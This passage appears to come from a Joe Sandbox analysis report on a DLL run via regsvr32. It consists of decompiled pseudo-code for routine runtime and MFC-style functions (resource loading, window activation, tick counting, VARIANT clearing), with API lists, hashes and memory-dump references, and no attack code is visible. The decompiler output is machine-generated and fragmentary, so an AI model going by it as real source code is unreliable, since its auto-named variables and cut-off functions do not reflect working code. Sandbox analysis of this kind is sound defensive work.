						_t21 =  *0x10046100; // 0x4451308
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10046100; // 0x4451308
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E10029B6E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10020BB5(_t25, _t29, _t31, 0x20);
				}
				return E10022759(_t33);
			}










                                                                                                            0x10029ad3
                                                                                                            0x10029ad3
                                                                                                            0x10029ad3
                                                                                                            0x10029ad3
                                                                                                            0x10029ad5
                                                                                                            0x10029ada
                                                                                                            0x10029ae4
                                                                                                            0x10029ae6
                                                                                                            0x10029aee
                                                                                                            0x10029b0f
                                                                                                            0x10029b15
                                                                                                            0x10029b19
                                                                                                            0x10029b1c
                                                                                                            0x10029b1f
                                                                                                            0x10029b25
                                                                                                            0x10029b27
                                                                                                            0x10029b29
                                                                                                            0x10029b2c
                                                                                                            0x10029b32
                                                                                                            0x10029b34
                                                                                                            0x10029b36
                                                                                                            0x10029b3c
                                                                                                            0x10029b3e
                                                                                                            0x10029b3f
                                                                                                            0x10029b44
                                                                                                            0x10029b3c
                                                                                                            0x10029b34
                                                                                                            0x10029b45
                                                                                                            0x10029b4a
                                                                                                            0x10029b4d
                                                                                                            0x10029b53
                                                                                                            0x10029b57
                                                                                                            0x10029b57
                                                                                                            0x10029b5d
                                                                                                            0x10029b64
                                                                                                            0x10029af6
                                                                                                            0x10029af6
                                                                                                            0x10029af6
                                                                                                            0x10029afb
                                                                                                            0x10029aff
                                                                                                            0x10029b04
                                                                                                            0x10029b0c

                                                                                                            APIs
                                                                                                              • Part of subcall function 10025E70: __getptd_noexit.LIBCMT ref: 10025E71
                                                                                                              • Part of subcall function 10025E70: __amsg_exit.LIBCMT ref: 10025E7E
                                                                                                            • __amsg_exit.LIBCMT ref: 10029AFF
                                                                                                            • __lock.LIBCMT ref: 10029B0F
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 10029B2C
                                                                                                            • InterlockedIncrement.KERNEL32(04451308), ref: 10029B57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2880340415-0
                                                                                                            • Opcode ID: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
                                                                                                            • Instruction ID: 7e2233ef4788b528b7c8923621eb479d41e657301323debbe484897fd832dd33
                                                                                                            • Opcode Fuzzy Hash: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
                                                                                                            • Instruction Fuzzy Hash: 8D01D235900721EBDB43DB64B94574EB3A0FF09790F954014E804AB6A2D774BD81DFDA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D4E7 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000D4E7(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E1000D09E(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000EC09(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}















                                                                                                            0x1000d4eb
                                                                                                            0x1000d4ed
                                                                                                            0x1000d4ef
                                                                                                            0x1000d4f3
                                                                                                            0x1000d4f5
                                                                                                            0x1000d52a
                                                                                                            0x1000d534
                                                                                                            0x1000d536
                                                                                                            0x1000d53d
                                                                                                            0x1000d53d
                                                                                                            0x00000000
                                                                                                            0x1000d543
                                                                                                            0x1000d4fc
                                                                                                            0x1000d509
                                                                                                            0x1000d511
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d515
                                                                                                            0x1000d51b
                                                                                                            0x1000d51f
                                                                                                            0x1000d528
                                                                                                            0x00000000
                                                                                                            0x1000d528
                                                                                                            0x1000d549

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1000D509
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,10007D86,?,?,10004C5C,8F64CB61), ref: 1000D515
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,8F64CB61), ref: 1000D522
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,8F64CB61), ref: 1000D53D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
                                                                                                            • Instruction ID: 281bcab43dd18555d5c8873d9ecd9dd0d63f565addb1b321d849296a265f2762
                                                                                                            • Opcode Fuzzy Hash: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
                                                                                                            • Instruction Fuzzy Hash: B0F09636201A115FF741AF658C8893FB7ACEFC96E6B02403AFD05D2116EE618D058271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10008219 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10008219() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E1000EFCE(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E10007C2C(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E1001FC9C(_t16);
			}








                                                                                                            0x10008219
                                                                                                            0x1000821c
                                                                                                            0x10008224
                                                                                                            0x1000822a
                                                                                                            0x1000822a
                                                                                                            0x10008232
                                                                                                            0x10008239
                                                                                                            0x10008239
                                                                                                            0x10008242
                                                                                                            0x10008244
                                                                                                            0x1000824a
                                                                                                            0x1000824d
                                                                                                            0x10008252
                                                                                                            0x10008252
                                                                                                            0x1000824d
                                                                                                            0x1000825c
                                                                                                            0x10008261
                                                                                                            0x10008269
                                                                                                            0x1000826e
                                                                                                            0x1000826e
                                                                                                            0x10008274
                                                                                                            0x1000827c

                                                                                                            APIs
                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10008239
                                                                                                            • GetActiveWindow.USER32 ref: 10008244
                                                                                                            • SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
                                                                                                            • FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E
                                                                                                              • Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveEnable$FreeResource
                                                                                                            • String ID:
                                                                                                            • API String ID: 253586258-0
                                                                                                            • Opcode ID: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
                                                                                                            • Instruction ID: 9d83087e220dd0781b059ca2b134525f77e60f6c7b422949920854a7550f5502
                                                                                                            • Opcode Fuzzy Hash: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
                                                                                                            • Instruction Fuzzy Hash: A0F03C34900A19CFEF12DB64CD855ADB7F1FF88B81B200528E48276169CB726E40CF21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001E221 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E1001E221(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x10048888;
					if( *0x10048888 == 0) {
						_t5 = GetTickCount();
						 *0x10048888 =  *0x10048888 + 1;
						__eflags =  *0x10048888;
						 *0x100453a0 = _t5;
					}
					_t4 = GetTickCount() -  *0x100453a0;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100453a0 = _t4;
					}
					return _t4;
				}
				return E1001E1CA(_t7, _t8, _t9, _t13, _t14, _a8);
			}









                                                                                                            0x1001e221
                                                                                                            0x1001e226
                                                                                                            0x1001e233
                                                                                                            0x1001e241
                                                                                                            0x1001e243
                                                                                                            0x1001e245
                                                                                                            0x1001e245
                                                                                                            0x1001e24b
                                                                                                            0x1001e24b
                                                                                                            0x1001e252
                                                                                                            0x1001e258
                                                                                                            0x1001e25d
                                                                                                            0x1001e25f
                                                                                                            0x1001e265
                                                                                                            0x1001e267
                                                                                                            0x1001e267
                                                                                                            0x00000000
                                                                                                            0x1001e26c
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 1001E243
                                                                                                            • GetTickCount.KERNEL32 ref: 1001E250
                                                                                                            • CoFreeUnusedLibraries.OLE32 ref: 1001E25F
                                                                                                            • GetTickCount.KERNEL32 ref: 1001E265
                                                                                                              • Part of subcall function 1001E1CA: CoFreeUnusedLibraries.OLE32(00000000,1001E2A9,00000000), ref: 1001E20E
                                                                                                              • Part of subcall function 1001E1CA: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1001E2A9), ref: 1001E214
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 685759847-0
                                                                                                            • Opcode ID: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
                                                                                                            • Instruction ID: 9aa4607869117499f4b65bf9b804208a697730aabcf92e8cb44ab6419cd381d0
                                                                                                            • Opcode Fuzzy Hash: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
                                                                                                            • Instruction Fuzzy Hash: D2E0ED30C04265DEE705EF20CE8464D3AE4FB4A392F914916E441DA161C7749EC0DF55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001842E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E1001842E(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E10004D4A( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E10004D4A( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E10017B9D(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E10020F40(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E1000911A( &_v20);
										E100157C0(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E10004D75(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E10004D75(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E10017B9D(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}



























                                                                                                            0x10018436
                                                                                                            0x10018438
                                                                                                            0x1001843d
                                                                                                            0x10018450
                                                                                                            0x10018454
                                                                                                            0x10018491
                                                                                                            0x10018491
                                                                                                            0x10018493
                                                                                                            0x10018496
                                                                                                            0x10018499
                                                                                                            0x100184b2
                                                                                                            0x100184b2
                                                                                                            0x100184b5
                                                                                                            0x100184b7
                                                                                                            0x100184bd
                                                                                                            0x100184be
                                                                                                            0x100184c5
                                                                                                            0x100184ce
                                                                                                            0x100184ce
                                                                                                            0x100184d1
                                                                                                            0x100184d4
                                                                                                            0x100184d7
                                                                                                            0x100184da
                                                                                                            0x10018584
                                                                                                            0x10018584
                                                                                                            0x10018587
                                                                                                            0x10018598
                                                                                                            0x1001859b
                                                                                                            0x1001859e
                                                                                                            0x100185a0
                                                                                                            0x100185a6
                                                                                                            0x100185ae
                                                                                                            0x100185b7
                                                                                                            0x100185b7
                                                                                                            0x100185ba
                                                                                                            0x100185bd
                                                                                                            0x100185e4
                                                                                                            0x100185e6
                                                                                                            0x00000000
                                                                                                            0x100185bf
                                                                                                            0x100185bf
                                                                                                            0x100185bf
                                                                                                            0x100185c1
                                                                                                            0x100185cb
                                                                                                            0x100185d3
                                                                                                            0x100185d8
                                                                                                            0x100185db
                                                                                                            0x100185dc
                                                                                                            0x100185df
                                                                                                            0x100185df
                                                                                                            0x00000000
                                                                                                            0x100185c1
                                                                                                            0x100184e0
                                                                                                            0x100184e0
                                                                                                            0x100184e3
                                                                                                            0x100184ed
                                                                                                            0x100184f0
                                                                                                            0x100184f2
                                                                                                            0x100184f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100184fa
                                                                                                            0x100184fa
                                                                                                            0x100184fd
                                                                                                            0x1001850b
                                                                                                            0x10018521
                                                                                                            0x1001852f
                                                                                                            0x10018536
                                                                                                            0x1001853e
                                                                                                            0x10018546
                                                                                                            0x1001854e
                                                                                                            0x10018551
                                                                                                            0x10018562
                                                                                                            0x10018566
                                                                                                            0x10018569
                                                                                                            0x10018569
                                                                                                            0x1001856f
                                                                                                            0x1001856f
                                                                                                            0x10018571
                                                                                                            0x10018571
                                                                                                            0x10018577
                                                                                                            0x1001857b
                                                                                                            0x1001857b
                                                                                                            0x00000000
                                                                                                            0x100184e3
                                                                                                            0x100184da
                                                                                                            0x1001849e
                                                                                                            0x1001849e
                                                                                                            0x100184a1
                                                                                                            0x100184a1
                                                                                                            0x100184a3
                                                                                                            0x100184a6
                                                                                                            0x100184a9
                                                                                                            0x100184aa
                                                                                                            0x100184ad
                                                                                                            0x100184ad
                                                                                                            0x00000000
                                                                                                            0x100184a1
                                                                                                            0x10018456
                                                                                                            0x10018458
                                                                                                            0x1001845b
                                                                                                            0x1001848e
                                                                                                            0x1001848e
                                                                                                            0x00000000
                                                                                                            0x1001848e
                                                                                                            0x1001845d
                                                                                                            0x10018460
                                                                                                            0x10018467
                                                                                                            0x1001846d
                                                                                                            0x10018471
                                                                                                            0x10018472
                                                                                                            0x10018472
                                                                                                            0x10018477
                                                                                                            0x1001847a
                                                                                                            0x1001847c
                                                                                                            0x1001847f
                                                                                                            0x10018484
                                                                                                            0x10018487
                                                                                                            0x1001848d
                                                                                                            0x00000000
                                                                                                            0x1001847a
                                                                                                            0x1001843f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearVariant
                                                                                                            • String ID: (
                                                                                                            • API String ID: 1473721057-3887548279
                                                                                                            • Opcode ID: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
                                                                                                            • Instruction ID: 6ae8da63e7d5010fc6edffe141db471ece515f0fbfe2aaea2c8eafc942244063
                                                                                                            • Opcode Fuzzy Hash: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
                                                                                                            • Instruction Fuzzy Hash: A6516875A00B01DFDB64CF68C9C295AB7F1FF48314B504A6EE5868BA91CB70FA80CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001615A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E1001615A(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E1001FBC4(E10034098, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x1003b29c);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E1001FC9C(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E1001BDF4( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
